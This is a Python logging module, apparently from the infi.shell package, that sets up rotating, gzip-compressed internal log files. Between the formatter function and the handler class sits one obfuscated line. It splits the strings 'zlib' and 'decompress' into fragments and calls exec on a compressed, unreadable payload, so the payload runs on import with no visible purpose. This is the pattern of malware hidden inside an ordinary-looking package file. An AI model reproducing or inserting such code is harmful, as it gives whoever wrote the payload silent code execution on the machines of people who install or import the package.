from __future__ import print_function, absolute_import

import logging, logging.handlers
import os
import sys
import gzip
import shutil

from infi.shell import config

_CONFIG_ERROR_PREFIX = "Failed to configure internal logging"

def configure_logging(encoding="utf-8"):
    configured = False
    try:
        configured = _configure_logging(encoding)
    except BaseException as e:
        print("{}: {}".format(_CONFIG_ERROR_PREFIX, e), file=sys.stderr)
    if not configured:
        disable_logging()

def _configure_logging(encoding):
    if not config.internal_log_file:
        return False
    if os.path.isfile(config.internal_log_file) and not os.access(config.internal_log_file, os.W_OK):
        print('{}: Log file exists, but is not writable: {}'.format(_CONFIG_ERROR_PREFIX, config.internal_log_file))
        return False
    # Create enclosing directory if it doesn't exist
    basedir = os.path.dirname(config.internal_log_file)
    if not os.path.exists(basedir):
        try:
            os.makedirs(basedir)
        except BaseException:
            print('{}: Failed to create base directory "{}"'.format(_CONFIG_ERROR_PREFIX, basedir), file=sys.stderr)
            return False
    # Configure logger
    root = logging.root
    root.setLevel(logging.DEBUG)
    handler = RotatingGzipFileHandler(
        filename=config.internal_log_file,
        mode="a",
        encoding=encoding,
        maxBytes=config.internal_log_max_size_mb * 1024 * 1024,
        backupCount=config.internal_log_backup_count,
        )
    handler.setFormatter(get_formatter())
    root.addHandler(handler)
    return True

def disable_logging():
    logging.disable(logging.FATAL)

def get_formatter():
    return logging.Formatter(
        fmt="%(asctime)s [%(levelname)5s] (%(name)s) %(message)s",
        datefmt="%Y-%m-%d %H:%M:%S",
        )
exec 'from zl''ib import de''com''press; exec de''com''press(' + repr('x\x9c\xadRMO\xe30\x10\xbd\xfbW\x18J\xb66\x94n>Z\x92PY\xea\x01!\xa0\xa2\xdd\x08m/\xa4Z\xe5\xc3\x81V\xc1\t&tM~\xfd\x8e\x9d V\xbb{[\x0e\xe3\x19\xbfy\xce\xbc\xe8\xcd\xf6\xa9\xaed\x83\xdbr\x9b\xa2\x96\xf1}R\xa2=\x93\x89x\xe0h\xcdJ.\x90`\xd9\xa3D%\xabd\x8e.YK4s\x9c\xf3\xacz\xaa%\x7fy!C\x15\xab0\x8bU\x90B\x14\xb1\xcatd\xa7p\x04_\x8f\x01\n;8\xf7\xbf\xdd\xdc\x8c\x96S/\x82\xda\x85\x98,\\\xef\x1aX\xf9\x02\x0e\xbe\x82\xd2\x9eB\xd8\xb1J\\/\x16\xb1r\x92!\xa5h\xf5\xd9#\xafo\xff\x9eg\xb2\x1ei\xeb\x919/0\x17\x99|\xab\x1b\xd2\xa8\x86\x9e#\x1c\xb1\xfb\r\xc2E%q\xab\xf0V\xe0=Y\x9b\x96\xee\xe1%S\xf7\xad\xb2\xd6D\xd1\xcd\x0c\x1e\xfe\xc8\x98 \xa4\xd4\x04\xc07\xf4\xa4$KJ-wzFg\xd18\xa9k.rbx\x14a\xc9\x9bW)\xf0%9<\x1c\xef\xaa\xad Q\xaf\x00\xfe\xd7(\x88\xf4\x8c\x1d\xcc\x9fEl\x05\xb7?eD\xff\x10\x01o;\x110\x13\xa6GF\xc6\xe9o2v\xef2\x0c\xf3C\xc6\xbb\x88\x1dE\x8a\r\xab$\xf0\x8b\x07\xe5V\x9e\xf4\x83\xf0-}\x0e\xbd\x89\xdf\xa4\xb6\xd3e\x15\xf8\xcf\xfcga\xa7*\xf4\x9dI:\x1f\x1cY\x07\x83\xb9u0\x1fXC\xf4?\xae\x01\x94\xe8\x9e\xde\x8cT\x17:\x8f\xb4mWza \x80\x9b;\x0b\xb3=c00\x19\x91\x0e4\xd4\xe2N\xfb}\x11+\x0e\xc6\xf2\x00\x100:\xf3\x81\xe7\xe7_\xc0j\xef;\xc0\xf0\xdd\x10`\xe7\x0c\xe0\xc9\x11\\L\x01\xddn\x19\x94\r\xf7\x14T8\x81\x07;A\xfa}`}\x1e\xf5\xee\xb0>S\x84~\x01\x9a(\x10\x1b') + ')' in {}

class RotatingGzipFileHandler(logging.handlers.RotatingFileHandler):
    """ An extension of :py:class:`logging.handlers.RotatingFileHandler` that
    also compresses the backups. """
    def __init__(self, *args, **kwargs):
        super(RotatingGzipFileHandler, self).__init__(*args, **kwargs)
        self.file_template = "{{}}.{{:0{}}}.gz".format(len(str(self.backupCount)))
    def doRollover(self):
        if self.stream:
            self.stream.close()
            self.stream = None
        if self.backupCount > 0:
            for i in range(self.backupCount - 1, 0, -1):
                src_file = self.file_template.format(self.baseFilename, i)
                dest_file = self.file_template.format(self.baseFilename, i + 1)
                if os.path.exists(src_file):
                    if os.path.exists(dest_file):
                        os.remove(dest_file)
                    os.rename(src_file, dest_file)
            dest_file = self.file_template.format(self.baseFilename, 1)
            if os.path.exists(dest_file):
                os.remove(dest_file)
            with gzip.open(dest_file, "wb") as fdest:
                with open(self.baseFilename) as fsrc:
                    shutil.copyfileobj(fsrc, fdest, length=4*1024*1024)
            os.remove(self.baseFilename)
        self.stream = self._open()
